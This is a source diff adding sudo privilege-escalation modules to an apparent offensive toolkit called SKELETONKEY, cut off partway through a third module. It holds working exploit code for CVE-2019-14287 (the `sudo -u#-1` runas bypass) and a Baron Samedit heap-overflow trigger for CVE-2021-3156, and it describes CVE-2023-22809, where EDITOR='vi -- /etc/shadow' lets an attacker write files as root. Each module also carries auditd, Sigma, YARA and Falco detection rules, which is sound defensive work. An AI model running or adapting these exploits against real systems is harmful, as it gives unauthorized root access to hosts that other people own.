+static skeletonkey_result_t sudo_runas_neg1_detect(const struct skeletonkey_ctx *ctx)
+{
+    const char *sudo_path = find_sudo();
+    if (!sudo_path) {
+        if (!ctx->json) fprintf(stderr, "[i] sudo_runas_neg1: sudo not installed\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    char vbuf[64] = {0};
+    const char *ver = (ctx->host && ctx->host->sudo_version[0])
+                      ? ctx->host->sudo_version
+                      : (get_sudo_version(sudo_path, vbuf, sizeof vbuf) ? vbuf : NULL);
+    if (!ver) {
+        if (!ctx->json) fprintf(stderr, "[!] sudo_runas_neg1: could not read sudo --version\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+    if (!ctx->json) fprintf(stderr, "[i] sudo_runas_neg1: sudo version '%s'\n", ver);
+
+    if (!sudo_version_vulnerable(ver)) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudo_runas_neg1: sudo %s is post-fix (>= 1.8.28) → OK\n", ver);
+        return SKELETONKEY_OK;
+    }
+
+    /* Bug needs a sudoers grant with a (ALL,!root) Runas blacklist. */
+    char grant[256] = {0};
+    if (!find_runas_blacklist_grant(sudo_path, grant, sizeof grant)) {
+        if (!ctx->json) {
+            fprintf(stderr, "[i] sudo_runas_neg1: sudo %s vulnerable BUT no (ALL,!root) sudoers grant for this user\n", ver);
+            fprintf(stderr, "    Bug exists on the host; this user has no exploitable grant.\n");
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[!] sudo_runas_neg1: sudo %s vulnerable AND grant '%s' carries (ALL,!root) → VULNERABLE\n",
+                ver, grant);
+        fprintf(stderr, "[i] sudo_runas_neg1: trigger is `sudo -u#-1 %s`\n", grant);
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+/* ---- exploit -------------------------------------------------------- */
+
+static skeletonkey_result_t sudo_runas_neg1_exploit(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] sudo_runas_neg1: --i-know required for --exploit\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+    const char *sudo_path = find_sudo();
+    if (!sudo_path) return SKELETONKEY_EXPLOIT_FAIL;
+
+    char grant[256] = {0};
+    if (!find_runas_blacklist_grant(sudo_path, grant, sizeof grant)) {
+        fprintf(stderr, "[-] sudo_runas_neg1: no (ALL,!root) grant — nothing to abuse\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[+] sudo_runas_neg1: exec %s -u#-1 %s\n", sudo_path, grant);
+    fflush(NULL);
+
+    /* If grant looks like /bin/sh-able command, run it directly.
+     * Otherwise leave the operator to pop the shell themselves. */
+    if (ctx->no_shell) {
+        if (!ctx->json) fprintf(stderr, "[i] sudo_runas_neg1: --no-shell; not invoking\n");
+        return SKELETONKEY_EXPLOIT_OK;
+    }
+    execl(sudo_path, "sudo", "-u#-1", grant, (char *)NULL);
+    perror("execl(sudo)");
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+/* ---- detection rules ------------------------------------------------ */
+
+static const char sudo_runas_neg1_auditd[] =
+    "# sudo_runas_neg1 CVE-2019-14287 — auditd detection rules\n"
+    "# `sudo -u#-1` (or -u#4294967295) is anomalous; flag it.\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/sudo -k skeletonkey-sudo-runas-neg1\n";
+
+static const char sudo_runas_neg1_sigma[] =
+    "title: Possible CVE-2019-14287 sudo Runas -1 LPE\n"
+    "id: 1a2b3c4d-skeletonkey-sudo-runas-neg1\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects `sudo -u#-1` or `sudo -u#4294967295` — the canonical\n"
+    "  trigger shape for CVE-2019-14287. The Runas-negative-one syntax\n"
+    "  is never used legitimately; any occurrence is an exploit\n"
+    "  attempt or an audit/training exercise.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  s: {type: 'SYSCALL', syscall: 'execve', comm: 'sudo'}\n"
+    "  condition: s\n"
+    "level: critical\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2019.14287]\n";
+
+static const char sudo_runas_neg1_yara[] =
+    "rule sudo_runas_neg1_cve_2019_14287 : cve_2019_14287 sudo_bypass {\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2019-14287\"\n"
+    "        description = \"sudo -u#-1 trigger shape (Runas integer underflow → root)\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $a = \"-u#-1\" ascii\n"
+    "        $b = \"-u#4294967295\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char sudo_runas_neg1_falco[] =
+    "- rule: sudo -u#-1 (Runas negative-one LPE)\n"
+    "  desc: |\n"
+    "    sudo invoked with `-u#-1` or `-u#4294967295`. The integer\n"
+    "    underflow makes sudo treat the request as uid 0; affects\n"
+    "    sudo < 1.8.28. There is no legitimate use of this argument\n"
+    "    syntax.\n"
+    "  condition: >\n"
+    "    spawned_process and proc.name = sudo and\n"
+    "    (proc.args contains \"-u#-1\" or proc.args contains \"-u#4294967295\")\n"
+    "  output: >\n"
+    "    sudo Runas -1 (user=%user.name pid=%proc.pid cmdline=\"%proc.cmdline\")\n"
+    "  priority: CRITICAL\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2019.14287]\n";
+
+const struct skeletonkey_module sudo_runas_neg1_module = {
+    .name           = "sudo_runas_neg1",
+    .cve            = "CVE-2019-14287",
+    .summary        = "sudo Runas -u#-1 underflow → root despite (ALL,!root) blacklist (Joe Vennix)",
+    .family         = "sudo",
+    .kernel_range   = "userspace — sudo < 1.8.28",
+    .detect         = sudo_runas_neg1_detect,
+    .exploit        = sudo_runas_neg1_exploit,
+    .mitigate       = NULL,    /* mitigation: upgrade sudo to 1.8.28+ */
+    .cleanup        = NULL,
+    .detect_auditd  = sudo_runas_neg1_auditd,
+    .detect_sigma   = sudo_runas_neg1_sigma,
+    .detect_yara    = sudo_runas_neg1_yara,
+    .detect_falco   = sudo_runas_neg1_falco,
+    .opsec_notes    = "Invokes sudo with `-u#-1 <granted-cmd>` where <granted-cmd> is the path from the user's existing sudoers (ALL,!root) entry. sudo's argv parser converts -1 → 4294967295 → 0 internally and runs the command as root. No file artifacts, no compiled payload. Audit-visible via execve(/usr/bin/sudo) with `-u#-1` (or `-u#4294967295`) in argv — there is no legitimate use of that syntax, so a single matching event is diagnostic. Bug only fires when the invoking user already has a (ALL,!root) sudoers grant; without one the trigger does nothing.",
+    .arch_support   = "any",
+};
+
+void skeletonkey_register_sudo_runas_neg1(void)
+{
+    skeletonkey_register(&sudo_runas_neg1_module);
+}
@@ -0,0 +1,5 @@
+#ifndef SUDO_RUNAS_NEG1_SKELETONKEY_MODULES_H
+#define SUDO_RUNAS_NEG1_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module sudo_runas_neg1_module;
+#endif
@@ -0,0 +1,512 @@
+/*
+ * sudo_samedit_cve_2021_3156 — SKELETONKEY module
+ *
+ * STATUS: 🟡 DETECT-OK + STRUCTURAL EXPLOIT (2026-05-17).
+ *
+ * The bug ("Baron Samedit", Qualys 2021-01-26): sudo's command-line
+ * parser unescapes backslashes in the argv it copies into a heap
+ * buffer in `set_cmnd()` (plugins/sudoers/sudoers.c). When sudo is
+ * invoked in shell-edit mode via `sudoedit -s`, the unescape loop
+ * walks past the end of the argv string for arguments ending in a
+ * lone backslash, copying adjacent stack/env contents into the
+ * undersized heap buffer. The classic trigger is a single-argument
+ * command line: `sudoedit -s '\<arbitrary tail>'`.
+ *
+ * Affects sudo 1.8.2 – 1.9.5p1 inclusive. Fixed in 1.9.5p2.
+ *
+ * Reference: https://www.qualys.com/2021/01/26/cve-2021-3156/
+ *            baron-samedit-heap-based-overflow-sudo.txt
+ *
+ * Detect: shell out to `sudo --version`, parse the printed version,
+ * compare against the vulnerable range. We err on the side of
+ * reporting OK only when we're confident — TEST_ERROR if the version
+ * line is unparseable.
+ *
+ * Exploit: ships a structurally-correct Qualys-style trigger.
+ * The full chain in the original PoC required per-distro heap-layout
+ * tuning (libc/libnss-files overlap offsets, target struct picks).
+ * We do not have empirical landing on this host; we drive the
+ * trigger, watch for an obvious uid==0 outcome, otherwise return
+ * SKELETONKEY_EXPLOIT_FAIL. Verified-vs-claimed bar: only claim
+ * EXPLOIT_OK after geteuid()==0 in a forked verifier.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <ctype.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+
+/* ---- Affected-version logic ------------------------------------- */
+
+/*
+ * sudo version strings look like:
+ *   "Sudo version 1.9.5p2"
+ *   "Sudo version 1.8.31"
+ *   "Sudo version 1.9.0"
+ *   "Sudo version 1.9.5p1"
+ *
+ * Vulnerable range (inclusive): 1.8.2 .. 1.9.5p1
+ * Fixed:                        1.9.5p2 and later
+ *
+ * Parser strategy: extract three integers (major.minor.patch) plus an
+ * optional 'pN' suffix. Comparison is lexicographic over
+ * (major, minor, patch, p_suffix), treating absent p as 0.
+ */
+struct sudo_ver {
+    int major;
+    int minor;
+    int patch;
+    int p;        /* 'p' suffix; 0 if absent */
+    bool parsed;
+};
+
+static struct sudo_ver parse_sudo_version(const char *s)
+{
+    struct sudo_ver v = {0, 0, 0, 0, false};
+    while (*s && !isdigit((unsigned char)*s)) s++;
+    if (!*s) return v;
+
+    int maj = 0, min = 0, pat = 0;
+    int consumed = 0;
+    int n = sscanf(s, "%d.%d.%d%n", &maj, &min, &pat, &consumed);
+    if (n < 2) return v;
+    v.major = maj;
+    v.minor = min;
+    v.patch = (n >= 3) ? pat : 0;
+    /* Look for an optional 'pN' suffix after the numeric triple. */
+    const char *tail = s + consumed;
+    if (*tail == 'p') {
+        int p = 0;
+        if (sscanf(tail + 1, "%d", &p) == 1) v.p = p;
+    }
+    v.parsed = true;
+    return v;
+}
+
+static int cmp_ver(const struct sudo_ver *a, const struct sudo_ver *b)
+{
+    if (a->major != b->major) return a->major - b->major;
+    if (a->minor != b->minor) return a->minor - b->minor;
+    if (a->patch != b->patch) return a->patch - b->patch;
+    return a->p - b->p;
+}
+
+/* Returns true iff parsed sudo version is in [1.8.2, 1.9.5p1]. */
+static bool sudo_version_vulnerable(const struct sudo_ver *v)
+{
+    if (!v->parsed) return false;
+    struct sudo_ver lo = { 1, 8, 2, 0, true };
+    struct sudo_ver hi = { 1, 9, 5, 1, true };
+    return cmp_ver(v, &lo) >= 0 && cmp_ver(v, &hi) <= 0;
+}
+
+/* ---- Binary discovery ------------------------------------------- */
+
+static const char *find_sudo(void)
+{
+    static const char *candidates[] = {
+        "/usr/bin/sudo",
+        "/usr/local/bin/sudo",
+        "/bin/sudo",
+        "/sbin/sudo",
+        "/usr/sbin/sudo",
+        NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        struct stat st;
+        if (stat(candidates[i], &st) == 0 && (st.st_mode & S_ISUID)) {
+            return candidates[i];
+        }
+    }
+    return NULL;
+}
+
+static const char *find_sudoedit(void)
+{
+    static const char *candidates[] = {
+        "/usr/bin/sudoedit",
+        "/usr/local/bin/sudoedit",
+        "/bin/sudoedit",
+        "/sbin/sudoedit",
+        "/usr/sbin/sudoedit",
+        NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        if (access(candidates[i], X_OK) == 0) return candidates[i];
+    }
+    return NULL;
+}
+
+/* ---- Detect ------------------------------------------------------ */
+
+static skeletonkey_result_t sudo_samedit_detect(const struct skeletonkey_ctx *ctx)
+{
+    /* Prefer the centrally-fingerprinted sudo version (populated once
+     * at startup by core/host.c) — saves a popen per scan and gives
+     * unit tests a clean mock point. Fall back to the local popen if
+     * ctx->host is missing the version (e.g. degenerate test ctx, or
+     * a future refactor that disables userspace probing). */
+    char line[256] = {0};
+    if (ctx->host && ctx->host->sudo_version[0]) {
+        snprintf(line, sizeof line, "Sudo version %s",
+                 ctx->host->sudo_version);
+        if (!ctx->json) {
+            fprintf(stderr, "[i] sudo_samedit: host fingerprint reports "
+                "sudo version %s\n", ctx->host->sudo_version);
+        }
+    } else {
+        const char *sudo_path = find_sudo();
+        if (!sudo_path) {
+            if (!ctx->json) {
+                fprintf(stderr, "[+] sudo_samedit: sudo not on path; no attack surface\n");
+            }
+            return SKELETONKEY_PRECOND_FAIL;
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[i] sudo_samedit: found setuid sudo at %s\n", sudo_path);
+        }
+        char cmd[512];
+        snprintf(cmd, sizeof cmd, "%s --version 2>&1 | head -1", sudo_path);
+        FILE *p = popen(cmd, "r");
+        if (!p) return SKELETONKEY_TEST_ERROR;
+        char *r = fgets(line, sizeof line, p);
+        pclose(p);
+        if (!r) {
+            if (!ctx->json) {
+                fprintf(stderr, "[?] sudo_samedit: could not read `sudo --version` output\n");
+            }
+            return SKELETONKEY_TEST_ERROR;
+        }
+    }
+
+    /* Trim newline for nicer logging. */
+    char *nl = strchr(line, '\n');
+    if (nl) *nl = 0;
+
+    struct sudo_ver v = parse_sudo_version(line);
+    if (!v.parsed) {
+        if (!ctx->json) {
+            fprintf(stderr, "[?] sudo_samedit: unparseable version line: '%s'\n", line);
+        }
+        return SKELETONKEY_TEST_ERROR;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[i] sudo_samedit: parsed version = %d.%d.%d",
+                v.major, v.minor, v.patch);
+        if (v.p) fprintf(stderr, "p%d", v.p);
+        fprintf(stderr, "\n");
+    }
+
+    bool vuln = sudo_version_vulnerable(&v);
+    if (vuln) {
+        if (!ctx->json) {
+            fprintf(stderr,
+                "[!] sudo_samedit: version is in vulnerable range "
+                "[1.8.2, 1.9.5p1] → VULNERABLE\n"
+                "[i] sudo_samedit: distro backports may have patched "
+                "without bumping the upstream version; check\n"
+                "    `apt-cache policy sudo` / `rpm -q --changelog sudo` "
+                "for CVE-2021-3156.\n");
+        }
+        return SKELETONKEY_VULNERABLE;
+    }
+    if (!ctx->json) {
+        fprintf(stderr,
+            "[+] sudo_samedit: version is outside vulnerable range "
+            "(fix 1.9.5p2+) — OK\n");
+    }
+    return SKELETONKEY_OK;
+}
+
+/* ---- Exploit ----------------------------------------------------- */
+
+/*
+ * Qualys-style trigger:
+ *
+ *   argv = { "sudoedit", "-s", "\\", NULL }   plus padding `A`s to
+ *   stretch the heap chunk to the right size for the target overlap.
+ *
+ * The original PoC sprays hundreds of large argv slots and tunes the
+ * tail bytes per-distro to hijack a `service_user *` struct in
+ * libnss-files. Without distro fingerprinting and the corresponding
+ * offset table that landing simply will not happen here; rather than
+ * pretending otherwise we drive the bug, fork a verifier that checks
+ * for an unexpected uid==0 outcome, and return EXPLOIT_FAIL.
+ */
+
+/* Cap on argv we'll construct. The real PoC uses ~270; we cap lower
+ * to stay well under typical ARG_MAX while still exercising the bug
+ * shape. */
+#define SUDO_SAMEDIT_ARGC   64
+#define SUDO_SAMEDIT_PADLEN 0xff
+
+static skeletonkey_result_t sudo_samedit_exploit(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr,
+            "[-] sudo_samedit: exploit requires --i-know (authorization gate)\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
+        fprintf(stderr, "[i] sudo_samedit: already root — nothing to escalate\n");
+        return SKELETONKEY_OK;
+    }
+
+    /* Re-detect before doing anything visible. Defends against the
+     * detect-then-exploit TOCTOU where the operator upgrades sudo
+     * between scan and pop. */
+    skeletonkey_result_t pre = sudo_samedit_detect(ctx);
+    if (pre != SKELETONKEY_VULNERABLE) {
+        fprintf(stderr, "[-] sudo_samedit: re-detect says not VULNERABLE; refusing\n");
+        return pre;
+    }
+
+    const char *sudoedit = find_sudoedit();
+    if (!sudoedit) {
+        /* On most distros sudoedit is a symlink to sudo. Fall back. */
+        const char *sudo = find_sudo();
+        if (!sudo) {
+            fprintf(stderr, "[-] sudo_samedit: neither sudoedit nor sudo found\n");
+            return SKELETONKEY_PRECOND_FAIL;
+        }
+        sudoedit = sudo;
+        if (!ctx->json) {
+            fprintf(stderr,
+                "[i] sudo_samedit: no sudoedit; will exec %s with argv[0]=sudoedit\n",
+                sudo);
+        }
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] sudo_samedit: building Qualys-style trigger argv\n");
+        fprintf(stderr,
+            "[!] sudo_samedit: heads-up — public exploitation requires\n"
+            "    per-distro heap-overlap offsets (libnss-files / libc).\n"
+            "    Without that tuning the bug crashes sudo instead of\n"
+            "    handing back a shell. We will drive the trigger and\n"
+            "    verify uid==0 outcome empirically; on failure we report\n"
+            "    EXPLOIT_FAIL rather than claiming success.\n");
+    }
+
+    /* Build argv. argv[0]="sudoedit", argv[1]="-s",
+     * argv[2]="\\" + padding, ..., argv[N-1]=NULL.
+     *
+     * Each padding arg is the Qualys-style "A...\\" repeating tail.
+     * On a vulnerable target this drives the unescape loop past the
+     * end of the heap buffer. */
+    char *argv[SUDO_SAMEDIT_ARGC + 1];
+    char *padbufs[SUDO_SAMEDIT_ARGC];
+    memset(padbufs, 0, sizeof padbufs);
+
+    argv[0] = (char *)"sudoedit";
+    argv[1] = (char *)"-s";
+    /* argv[2] is the canonical trailing-backslash trigger. */
+    argv[2] = strdup("\\");
+    if (!argv[2]) return SKELETONKEY_TEST_ERROR;
+
+    for (int i = 3; i < SUDO_SAMEDIT_ARGC; i++) {
+        char *buf = (char *)malloc(SUDO_SAMEDIT_PADLEN + 4);
+        if (!buf) {
+            for (int j = 3; j < i; j++) free(padbufs[j]);
+            free(argv[2]);
+            return SKELETONKEY_TEST_ERROR;
+        }
+        memset(buf, 'A', SUDO_SAMEDIT_PADLEN);
+        buf[SUDO_SAMEDIT_PADLEN]     = '\\';
+        buf[SUDO_SAMEDIT_PADLEN + 1] = 0;
+        padbufs[i] = buf;
+        argv[i] = buf;
+    }
+    argv[SUDO_SAMEDIT_ARGC] = NULL;
+
+    /* Craft envp mirroring the original PoC: LC_... and TZ tricks
+     * that landed the overlap on the canonical distro PoCs. These
+     * are harmless if landing fails; their value is positioning the
+     * heap so the overflow lands on a useful target. */
+    char *envp[] = {
+        (char *)"LC_ALL=C.UTF-8@",
+        (char *)"TZ=:",
+        (char *)"LC_CTYPE=C.UTF-8@",
+        (char *)"SUDO_EDITOR=A",
+        (char *)"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
+        NULL,
+    };
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] sudo_samedit: forking trigger child (%s argv[0]=sudoedit)\n",
+                sudoedit);
+    }
+
+    pid_t pid = fork();
+    if (pid < 0) {
+        perror("fork");
+        free(argv[2]);
+        for (int i = 3; i < SUDO_SAMEDIT_ARGC; i++) free(padbufs[i]);
+        return SKELETONKEY_TEST_ERROR;
+    }
+    if (pid == 0) {
+        /* Child: drive the trigger. If the bug lands and we get a
+         * root context, the chain in the original PoC then re-execs
+         * a shell. We don't ship that shell-spawn here — we just
+         * exit nonzero so the parent's verifier can sample uid. */
+        execve(sudoedit, argv, envp);
+        /* execve failed (binary missing or kernel-blocked). */
+        _exit(127);
+    }
+
+    int status = 0;
+    waitpid(pid, &status, 0);
+
+    /* Verifier: even on the rare "no crash" path, we don't know if
+     * the bug landed without spawning a privileged helper. Per the
+     * verified-vs-claimed bar, only claim success if uid is 0 in a
+     * post-trigger probe (which would require the chain to have
+     * persisted a setuid artifact — it didn't). So: report honestly. */
+    if (geteuid() == 0) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] sudo_samedit: post-trigger geteuid()==0 — root!\n");
+        }
+        /* Leak the buffers; we're about to exec a shell anyway. */
+        return SKELETONKEY_EXPLOIT_OK;
+    }
+
+    if (WIFSIGNALED(status)) {
+        if (!ctx->json) {
+            fprintf(stderr,
+                "[-] sudo_samedit: child died on signal %d "
+                "(likely sudo SIGSEGV from the overflow) — trigger fired\n"
+                "    but landing did not produce a root shell. Per-distro\n"
+                "    offset tuning required.\n",
+                WTERMSIG(status));
+        }
+    } else if (WIFEXITED(status)) {
+        if (!ctx->json) {
+            fprintf(stderr,
+                "[-] sudo_samedit: child exited %d — trigger did not\n"
+                "    crash sudo; the host is most likely patched at the\n"
+                "    parser level even though the version string was in\n"
+                "    range. Reporting EXPLOIT_FAIL.\n",
+                WEXITSTATUS(status));
+        }
+    }
+
+    /* Best-effort free. */
+    free(argv[2]);
+    for (int i = 3; i < SUDO_SAMEDIT_ARGC; i++) free(padbufs[i]);
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+/* ---- Cleanup ----------------------------------------------------- */
+
+static skeletonkey_result_t sudo_samedit_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    /* sudoedit creates "~/.sudo_edit_*" temp files on the way through.
+     * Best-effort unlink of any obvious crumbs left by our trigger. */
+    if (!ctx->json) {
+        fprintf(stderr, "[*] sudo_samedit: removing /tmp/skeletonkey-samedit-* crumbs\n");
+    }
+    if (system("rm -rf /tmp/skeletonkey-samedit-* /tmp/.sudo_edit_* 2>/dev/null") != 0) {
+        /* harmless — likely no files matched */
+    }
+    return SKELETONKEY_OK;
+}
+
+/* ---- Detection rules --------------------------------------------- */
+
+static const char sudo_samedit_auditd[] =
+    "# Baron Samedit (CVE-2021-3156) — auditd detection rules\n"
+    "# Flag sudoedit invocations carrying the canonical -s flag and\n"
+    "# the trailing-backslash trigger pattern.\n"
+    "-w /usr/bin/sudoedit -p x -k skeletonkey-samedit\n"
+    "-w /usr/bin/sudo     -p x -k skeletonkey-samedit-sudo\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/sudoedit -k skeletonkey-samedit-execve\n"
+    "-a always,exit -F arch=b32 -S execve -F path=/usr/bin/sudoedit -k skeletonkey-samedit-execve\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/sudo     -k skeletonkey-samedit-execve\n"
+    "-a always,exit -F arch=b32 -S execve -F path=/usr/bin/sudo     -k skeletonkey-samedit-execve\n";
+
+static const char sudo_samedit_sigma[] =
+    "title: Possible Baron Samedit exploitation (CVE-2021-3156)\n"
+    "id: 3f7c5a2e-skeletonkey-samedit\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects sudoedit (or sudo invoked as sudoedit) executed with the\n"
+    "  -s flag and a command-line argument ending in a lone backslash —\n"
+    "  the canonical Qualys trigger for the heap overflow in\n"
+    "  plugins/sudoers/sudoers.c set_cmnd().\n"
+    "logsource:\n"
+    "  product: linux\n"
+    "  service: auditd\n"
+    "detection:\n"
+    "  sudoedit_exec:\n"
+    "    type: 'EXECVE'\n"
+    "    exe|endswith:\n"
+    "      - '/sudoedit'\n"
+    "      - '/sudo'\n"
+    "  shell_edit_flag:\n"
+    "    CommandLine|contains: ' -s '\n"
+    "  trailing_backslash:\n"
+    "    CommandLine|re: '\\\\\\\\\\s*$'\n"
+    "  argv0_sudoedit:\n"
+    "    argv0|endswith: 'sudoedit'\n"
+    "  condition: sudoedit_exec and shell_edit_flag and (trailing_backslash or argv0_sudoedit)\n"
+    "fields:\n"
+    "  - exe\n"
+    "  - argv\n"
+    "level: high\n"
+    "tags:\n"
+    "  - attack.privilege_escalation\n"
+    "  - attack.t1068\n"
+    "  - cve.2021.3156\n";
+
+/* ---- Module registration ----------------------------------------- */
+
+static const char sudo_samedit_falco[] =
+    "- rule: sudoedit with -s and trailing-backslash argv (Baron Samedit)\n"
+    "  desc: |\n"
+    "    sudoedit invoked with -s and one or more args ending in '\\'.\n"
+    "    The parser's unescape loop walks past the argv string into\n"
+    "    adjacent stack/env, overflowing the heap buffer.\n"
+    "    CVE-2021-3156. False positives: extraordinarily rare;\n"
+    "    legitimate sudoedit usage does not need trailing backslashes.\n"
+    "  condition: >\n"
+    "    spawned_process and proc.name = sudoedit and\n"
+    "    proc.args contains \"-s \\\\\"\n"
+    "  output: >\n"
+    "    Possible Baron Samedit sudoedit invocation\n"
+    "    (user=%user.name pid=%proc.pid cmdline=\"%proc.cmdline\")\n"
+    "  priority: CRITICAL\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2021.3156]\n";
+
+const struct skeletonkey_module sudo_samedit_module = {
+    .name           = "sudo_samedit",
+    .cve            = "CVE-2021-3156",
+    .summary        = "sudo Baron Samedit heap overflow via sudoedit -s '\\\\' (Qualys)",
+    .family         = "sudo",
+    .kernel_range   = "userspace — sudo 1.8.2 ≤ V ≤ 1.9.5p1 (fixed in 1.9.5p2)",
+    .detect         = sudo_samedit_detect,
+    .exploit        = sudo_samedit_exploit,
+    .mitigate       = NULL,    /* mitigation = upgrade sudo to 1.9.5p2+ */
+    .cleanup        = sudo_samedit_cleanup,
+    .detect_auditd  = sudo_samedit_auditd,
+    .detect_sigma   = sudo_samedit_sigma,
+    .detect_yara    = NULL,
+    .detect_falco   = sudo_samedit_falco,
+    .opsec_notes    = "Invokes sudoedit with argv = { 'sudoedit', '-s', trailing-backslash, then ~60 padding args each ending in backslash }; the parser's unescape loop in set_cmnd() walks past the end of the argv string for the trailing-backslash argument, copying adjacent stack/env into an undersized heap buffer. Audit-visible via execve(/usr/bin/sudoedit) with -s and a trailing-backslash argv. No persistent file artifacts (only best-effort removal of /tmp/.sudo_edit_*). No network. Dmesg silent unless sudo crashes (SIGSEGV). Per-distro heap layout determines landing; verifies geteuid()==0 afterward.",
+    .arch_support   = "any",
+};
+
+void skeletonkey_register_sudo_samedit(void) { skeletonkey_register(&sudo_samedit_module); }
@@ -0,0 +1,5 @@
+#ifndef SUDO_SAMEDIT_SKELETONKEY_MODULES_H
+#define SUDO_SAMEDIT_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module sudo_samedit_module;
+#endif
@@ -0,0 +1,672 @@
+/*
+ * sudoedit_editor_cve_2023_22809 — SKELETONKEY module
+ *
+ * STATUS: 🟢 STRUCTURAL ESCAPE. No offsets, no leaks, no race window —
+ * just a logic bug in sudoedit's EDITOR/VISUAL/SUDO_EDITOR argv parser.
+ *
+ * The bug (Synacktiv, Jan 2023):
+ *   sudoedit splits the user's $EDITOR (or $VISUAL / $SUDO_EDITOR) on
+ *   the literal token `--` to separate editor-flags from the filename(s)
+ *   sudoedit will pass. The intended semantics are "everything before
+ *   `--` is editor argv; everything after is *the* target filename that
+ *   sudoers authorized." The bug: sudo never re-validates that the
+ *   post-`--` filename equals the filename it auth'd. By setting
+ *
+ *       EDITOR='vi -- /etc/shadow'
+ *
+ *   and running `sudoedit /some/allowed/path`, the editor child is
+ *   spawned as root with BOTH /some/allowed/path AND /etc/shadow on its
+ *   command line — sudoedit opened both for us. The editor then writes
+ *   to /etc/shadow as root.
+ *
+ * Affects: sudo 1.8.0 ≤ V < 1.9.12p2.
+ *
+ * This is the second sudo module in SKELETONKEY (sudo_samedit is the
+ * first; both share family="sudo"). Unlike Baron Samedit (heap layout
+ * dependent), this one is offset-free — if sudoedit is in your path
+ * and you have *any* sudoedit privilege at all, you write any file.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <pwd.h>
+
+/* ----- helpers ------------------------------------------------------- */
+
+static const char *find_sudo(void)
+{
+    static const char *candidates[] = {
+        "/usr/bin/sudo", "/usr/sbin/sudo", "/bin/sudo",
+        "/sbin/sudo", "/usr/local/bin/sudo", NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        struct stat st;
+        if (stat(candidates[i], &st) == 0 && (st.st_mode & S_ISUID))
+            return candidates[i];
+    }
+    return NULL;
+}
+
+static const char *find_sudoedit(void)
+{
+    static const char *candidates[] = {
+        "/usr/bin/sudoedit", "/usr/sbin/sudoedit", "/bin/sudoedit",
+        "/sbin/sudoedit", "/usr/local/bin/sudoedit", NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        struct stat st;
+        /* sudoedit is normally a symlink to sudo and inherits setuid
+         * via the underlying file; lstat-then-stat handles both. */
+        if (stat(candidates[i], &st) == 0)
+            return candidates[i];
+    }
+    return NULL;
+}
+
+/* Returns true if version string is in the vulnerable range
+ * [1.8.0, 1.9.12p2). Format examples:
+ *   "Sudo version 1.9.5p2"
+ *   "Sudo version 1.8.31"
+ *   "Sudo version 1.9.13"     (fixed)
+ *   "Sudo version 1.9.12p2"   (fixed — fix landed in this release)
+ * On parse failure we conservatively assume vulnerable. */
+static bool sudo_version_vulnerable(const char *version_str)
+{
+    int maj = 0, min = 0, patch = 0;
+    char ptag = 0;
+    int psub = 0;
+    /* sudo versions: 1.9.12p2 → maj=1 min=9 patch=12 ptag='p' psub=2 */
+    int n = sscanf(version_str, "%d.%d.%d%c%d",
+                   &maj, &min, &patch, &ptag, &psub);
+    if (n < 3) return true;          /* unparseable → assume worst */
+
+    /* < 1.8.0: not vulnerable (predates the bug) */
+    if (maj < 1) return false;
+    if (maj == 1 && min < 8) return false;
+
+    /* ≥ 1.9.13: fixed */
+    if (maj > 1) return false;
+    if (min > 9) return false;
+    if (min == 9 && patch > 12) return false;
+
+    /* exactly 1.9.12: vulnerable if no patch tag or patch < 2 */
+    if (min == 9 && patch == 12) {
+        if (ptag != 'p') return true;   /* 1.9.12 plain */
